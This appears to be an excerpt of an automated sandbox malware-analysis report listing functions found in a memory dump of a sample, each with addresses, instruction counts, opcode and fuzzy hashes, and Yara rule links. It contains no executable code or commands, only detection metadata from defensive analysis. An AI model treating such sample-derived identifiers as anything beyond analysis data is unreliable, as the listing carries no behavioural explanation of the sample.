                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bff48a95f92ca863f5759414af5eec9ef937b7f8b6822fdad8b4c535cca36406
                                                                                                                                                                                                                                  • Instruction ID: 2a76f512c14c457262f5a7a25116ba1ceb4464d1517287ab58f5c0df63ffdf84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bff48a95f92ca863f5759414af5eec9ef937b7f8b6822fdad8b4c535cca36406
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B515C71200A05DFDB32DF69C9E0EAAB7F9FB24744F41042EE6569B261D730E941CB60
                                                                                                                                                                                                                                  Function 014C44D1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                                                                                                                                                  • Instruction ID: b369b2dc4109cbc67363535dd800766b43289050e4b485d8335f4bb33cf227b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5551C475E0020AABDF51DF94C560BEEBBB5AF54B14F08406EEA04AB350D734DA41CBA0
                                                                                                                                                                                                                                  Function 014A510D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 105ab42159f9a71b5209edf8b2aa5ceee685a4c88c11941cfa21f94ec17aae31
                                                                                                                                                                                                                                  • Instruction ID: f67c02b3d1c74d73187514014f471028e003273e33accf64b0215b56676127fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 105ab42159f9a71b5209edf8b2aa5ceee685a4c88c11941cfa21f94ec17aae31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09519072A01206DFEF22DBA9CA40BEE77B4BB38754F52001AF501FF2A1D775A8418B51
                                                                                                                                                                                                                                  Function 01573157 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                                  • Instruction ID: 21e020cc6e699cd9298bd97ce4dbc02af2ed0ec6aa5deb843e996ba0b08b32b8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8e46193db8e3b5b16c475c6b7e0eac9c3dab9cb937863f6c3e187fb8c66faf7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C451CC71200606EFCB56CF58D485A9AFBF9FF54314F14C4AAE9089F222E371E946CB90
                                                                                                                                                                                                                                  Function 014DA350 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d78f684c9df4d6cc1d78b1a67f4f8acf1b16222bb387c3b8deedf86989c2ae76
                                                                                                                                                                                                                                  • Instruction ID: 4327d399681dab7818f83efd61cfe2e3d4410529cca2253162fb1294678113bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78f684c9df4d6cc1d78b1a67f4f8acf1b16222bb387c3b8deedf86989c2ae76
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D94136716802029BDF26EF6A98D1B6A3765FB60B08F03006EED019F265D7F1E805C791
                                                                                                                                                                                                                                  Function 0156A553 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                                                                  • Instruction ID: 4f28d08143d1a35b629a0a5627f483893c8d6db011a9c7d65380103558608d18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF41E972A01716AFDB25CF28C880A6EB7ADFF94314B04456EE9129F644EB30ED14CBD0
                                                                                                                                                                                                                                  Function 014D0118 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f898b541db9b7a73582eeaab37acc54826d372e5afbc6d0917c5d2afe51ec837
                                                                                                                                                                                                                                  • Instruction ID: fc5e3f414b73a74e575839b0157a74a19ea9f6659d5d53810fa437169b4eba37
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f898b541db9b7a73582eeaab37acc54826d372e5afbc6d0917c5d2afe51ec837
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541AA35A022199BDF10DF99C460AEEBBB4BF58604F14816FF815AB360D7359D42CBA4
                                                                                                                                                                                                                                  Function 014AD454 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3d8c24d8a5887968cbb65aca7f3b8779c81d5cbb5ff6136994dd5ea2f6160970
                                                                                                                                                                                                                                  • Instruction ID: 2b9afc99b943cae2369296f1979a4bbf5aa86290b73ebd4f859c8e06d0b804ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d8c24d8a5887968cbb65aca7f3b8779c81d5cbb5ff6136994dd5ea2f6160970
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6251DF32A046918FD726CF9DC440B6A77E5BB54B90F4A04A6F9418FBE1D734EC41CB61
                                                                                                                                                                                                                                  Function 014A6074 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0836161e0a863f4a5f58109b9a511f4edc87325c25446af7e1bb5c65012e64e9
                                                                                                                                                                                                                                  • Instruction ID: db47d8b282377e31bb060d30684e05bc34c9e19dd9a3f51e786a4227c9171a06
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0836161e0a863f4a5f58109b9a511f4edc87325c25446af7e1bb5c65012e64e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B551F7B09401169BDB26CF68CC44BE9BBF0FF21314F5A42AAD5159B2E1D774A9C1CF41
                                                                                                                                                                                                                                  Function 0149B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6de3af88d699b9b03e5c848dfca18d210c37933118db1912d60345c4d5861ee5
                                                                                                                                                                                                                                  • Instruction ID: df55b2013b13bda34ae6d72590d1955f21f5a50ff7637ed8d10b68a73049e80a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de3af88d699b9b03e5c848dfca18d210c37933118db1912d60345c4d5861ee5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46419FB1640606EFDF22AF6AE891F66BBE8EB60794F01446FE6118B270D770D901CB50
                                                                                                                                                                                                                                  Function 015681EE Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                  • Instruction ID: f26a4a8326b93cbf4ca1cd33ae3c64c926f0d4627397988d52c80f6409a26ad4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC419571B00306ABDB15DF99C890AAFBBBEFF98610F144069E915AB351DA70DE04C7A0
                                                                                                                                                                                                                                  Function 014CA390 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 091e2e52e8730ca515581c93c65e8b4a27932121afe1e756ca73019802424cac
                                                                                                                                                                                                                                  • Instruction ID: 81295c69c200bf93f1adc70d850f8efa192fe777656ce6249cfa5b8ba5950e12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 091e2e52e8730ca515581c93c65e8b4a27932121afe1e756ca73019802424cac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E541F536900209CFCB61CFA8D5987AEB7B0FB14714F25416ED421AB3A0EB749C05CB65
                                                                                                                                                                                                                                  Function 014DF523 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3000748c3278ec6f88ea40367c461eca22c42d415705db3b555601f9be9759e9
                                                                                                                                                                                                                                  • Instruction ID: a7ce44e11db83909d64bd2f7dbc69be44f83189668d4e8e7b7819737dc5cccc7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3000748c3278ec6f88ea40367c461eca22c42d415705db3b555601f9be9759e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E54149B4D00249EFDB24CFA9D490AAEBBF4FB49300F51856FE559AB211D730990ACF60
                                                                                                                                                                                                                                  Function 014A254C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e352311a73ddb0597081e6ca4678da4d76a129950f40ddf6da5a52520c11f286
                                                                                                                                                                                                                                  • Instruction ID: 5b643e3bc9afd74e4b97fe1d300c66b5f127b3c7da4d6994deba79e19f9c8c9c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e352311a73ddb0597081e6ca4678da4d76a129950f40ddf6da5a52520c11f286
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E41A9B15027018FCB21DF29C950B5AB7E1FB64310F92869FC15A8B6B1DB70A946DB41
                                                                                                                                                                                                                                  Function 01520443 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 40408d454962dd640f5f2ca1ede44dde821f2f309f0166e2fefd0e19386d9a48
                                                                                                                                                                                                                                  • Instruction ID: c736e43fa525c6093404a9e500fce48fba419ad049bce0b76c76259ee168bcc6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40408d454962dd640f5f2ca1ede44dde821f2f309f0166e2fefd0e19386d9a48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 414193B25043119FD760DF29C844B9BBBE8FF98754F008A2EF598DB290D7709505CB92
                                                                                                                                                                                                                                  Function 01520227 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d8d8b9e477e6d5b654c77f91704fd27dd0fbe8358b79ba2dea37149ee30cf7e5
                                                                                                                                                                                                                                  • Instruction ID: 6d123b06fb6bc28cb1026687e48dc4c702e0db772269799e3a0e08bd67df7167
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d8b9e477e6d5b654c77f91704fd27dd0fbe8358b79ba2dea37149ee30cf7e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41C2326056529FD721DF69D880A6FB7E9BF99700F040A1EF954CB6D0E730D904C7A6
                                                                                                                                                                                                                                  Function 014A4779 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fef42ea924d38cb7fc7ddeeafc82774bda5aee3dcb862e1ff0729924b1459cfd
                                                                                                                                                                                                                                  • Instruction ID: 745329af5b9c36dfb6818006d45c3201429730e7f49450d6fb8c23ac3a7dc500
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef42ea924d38cb7fc7ddeeafc82774bda5aee3dcb862e1ff0729924b1459cfd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D41C0746003418BD725CF29E894B2FBBE9ABA0750F5E442EE6518B2B1D7B0D845CB91
                                                                                                                                                                                                                                  Function 014B01F1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                                                                                                                                  • Instruction ID: b0556d691bc269ba884709de691bc25c9e4cd038310405d9ddd95eaad489941d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55312B31600245ABDB228BA8CC84BDFBFB9AF14350F04456BF855DB362D6749889C764
                                                                                                                                                                                                                                  Function 014C9194 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: ae3c3b5fc4df136f7f5b8936504fa59d956730a914b570c7d34ab8e85cc20d1c
                                                                                                                                                                                                                                  • Instruction ID: f26748650c4774fde65fae2c06ada6300e9c171606565a84cc3b9d164cca5ab5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae3c3b5fc4df136f7f5b8936504fa59d956730a914b570c7d34ab8e85cc20d1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F631C676A00229AFDB618F58DC40F9ABBB6AF85714F0105DEE94CAB250CB30DD458F51
                                                                                                                                                                                                                                  Function 014A4180 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 477d058d55023d0e092a12ccce95b8bb27a522543becf1619b1fb6b773e42530
                                                                                                                                                                                                                                  • Instruction ID: eb58f35c633dbbfa8a91168efbf29d7be45ce4a928939f752e77d9338bbf2582
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 477d058d55023d0e092a12ccce95b8bb27a522543becf1619b1fb6b773e42530
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3941D372200741DFD722CF68C494FDA7BE4BF64754F49881EE5598B2A0C7B4E804CBA0
                                                                                                                                                                                                                                  Function 014C5004 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                                                                                                  • Instruction ID: 06435b88b400c52916a91f5095d203588483888fe373bbd3e6d8baa8bcea9692
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D3103793082019FE761DA6E8450B6FBBD4AB95B50F04852FE985CF3A1C375D842C3E2
                                                                                                                                                                                                                                  Function 0149B420 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: df2aa12542e994ed3ccfd83404e0365d2c079c3b91216a423d7ea92858fd4b39
                                                                                                                                                                                                                                  • Instruction ID: 9a514ac3648629af8deff28b73c5762b656ec88d6587bc3119122440eaa825d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df2aa12542e994ed3ccfd83404e0365d2c079c3b91216a423d7ea92858fd4b39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F31F172500208AFCB21DF18D880E6A7BA5EF94764F15427EE9154F3A2C731ED46DBE0
                                                                                                                                                                                                                                  Function 014A8470 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0bf9b06134d9d8700325d04a726c6aaf8069ed3fd41042662addab5de3cbe12b
                                                                                                                                                                                                                                  • Instruction ID: 17cf56e63505d08a8f08b16dde87bf6358f9f66eed90d9a46983608d779db393
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bf9b06134d9d8700325d04a726c6aaf8069ed3fd41042662addab5de3cbe12b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 883190B16057029FE721CF19C840B2BBBE5FB98700F45496EE9889B3A1E774DC44CB92
                                                                                                                                                                                                                                  Function 014DA5E7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                                                                                                                                                  • Instruction ID: 9874b68b7fe576f8380527522e65d4a832df8f72dc84d0c6e9da201672f8a8a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
